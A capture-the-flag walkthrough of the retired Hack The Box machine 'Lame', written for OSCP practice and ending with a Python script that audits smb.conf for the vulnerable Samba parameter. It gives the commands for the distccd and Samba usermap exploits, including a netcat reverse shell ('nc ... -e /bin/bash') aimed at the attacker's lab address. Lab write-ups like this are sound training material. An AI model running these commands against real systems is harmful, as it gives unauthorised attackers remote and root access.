Hack The Box — Lame Walkthrough
Like a lot of people I am starting off my OSCP prep by running through TJnull’s OSCP HTB/Vulnhub VM list and doing each box without Metasploit, starting with Lame.
I have decided to do writeups on each of the retired machines I complete to help reinforce the techniques and processes each box helps develop.
Lame is first in the list and was a pretty easy box to root overall. There are a couple of different ways to root this host; this is just how I obtained root. Let's begin.
Recon
For initial recon I use AutoRecon by Tib3rius; it saves a lot of time and outputs scan results nice and neat.
Command: python autorecon.py 10.10.10.3
Checking the quick scan output, we have a couple of ports open:
FTP — The version of vsftpd running on the host appears to be vulnerable to CVE-2011-2523; however, the exploit fails to complete and nothing binds on port 6200. Anonymous login is enabled for this FTP server, but there is no read/write access once authenticated.
SSH — I could not find any applicable SSH vulnerabilities, and I wanted to avoid brute-forcing the login.
SMB — A quick Google search for Samba 3.0.20 (the SMB service) exploits reveals it may be vulnerable to CVE-2007-2447; let's make a mental note of this for now.
distccd — distcc is a distributed compiler; its daemon listens on port 3632. A quick look at our AutoRecon output reveals it is vulnerable to RCE, so we start here (yes, I had not checked the SMB scan output yet :) ).
Exploitation
Taking a look into distcc, a quick Google search brings me to a gist with code related to CVE-2004-2687.
This simple script lets us pass the target IP and port (3632) as arguments along with a command to execute on the target.
Set up our netcat listener:
Command: nc -nlvp 4441
Execute the CVE-2004-2687 script, passing a command for the target to connect back to our attacker box:
Command: python ditccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.9 4441 -e /bin/bash"
Check our netcat listener and we have a shell as daemon:
After some quick poking around we find the user flag in the home directory of the user makis:
At this point I was looking at various privilege escalation options, but decided to go back and take a look at the AutoRecon SMB output and related vulns.
Going back to our user-level daemon session, we can see that the smbd service/process is running as root:
After some quick research on CVE-2007-2447, we locate a simple script that will let us pass target IP/port and command args to execute.
We set up our second netcat listener:
Command: nc -nlvp 4442
And execute the RCE script:
Command: python3 usermap_script.py 10.10.10.3 445 10.10.14.9 4442
Checking our listener on 4442, we should now have access.
We can quickly spawn an interactive python shell and view our root flag:
Done!
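On the defensive side, the Samba parameter behind CVE-2007-2447 is "username map script" in smb.conf, and the vendor fix was to remove that parameter or upgrade Samba. The following is an added example, not part of this write-up and not Samba's own tooling, that audits a constructed smb.conf fragment for that parameter and reports every section that sets it (the script path /etc/samba/scripts/mapusers.sh in the sample is made up):

```python
import re
from typing import Dict, List

# Constructed smb.conf fragment for the demo (not the box's real config).
# The "username map script" parameter is the one abused by CVE-2007-2447.
SAMPLE_SMB_CONF = """\
[global]
    workgroup = WORKGROUP
    server string = %h server (Samba)
    Username Map Script = /etc/samba/scripts/mapusers.sh
    security = user

[homes]
    browseable = no
"""

def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse smb.conf's [section] / key = value layout into nested dicts."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":      # skip blank lines and comments
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:   # stray line outside a section
            continue
        key, _, value = line.partition("=")
        # Samba matches parameter names ignoring case and whitespace
        sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections

def audit_username_map_script(text: str) -> List[str]:
    """Return one finding per section that sets 'username map script'."""
    findings = []
    for section, params in parse_smb_conf(text).items():
        script = params.get("usernamemapscript")
        if script is not None:
            findings.append(
                f"[{section}] username map script = {script}: remove this "
                "parameter or upgrade Samba (CVE-2007-2447)")
    return findings

if __name__ == "__main__":
    print("\n".join(audit_username_map_script(SAMPLE_SMB_CONF)) or "no findings")
```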
Conclusion
A super straightforward box. It made me realise I need to include a better "planning" phase in my methodology, i.e. once the recon scripts are finished, don't just dive right in; take stock of what you have and then map out your paths. I actively do this sometimes, but it needs to become second nature.
If you are here, thanks for reading :)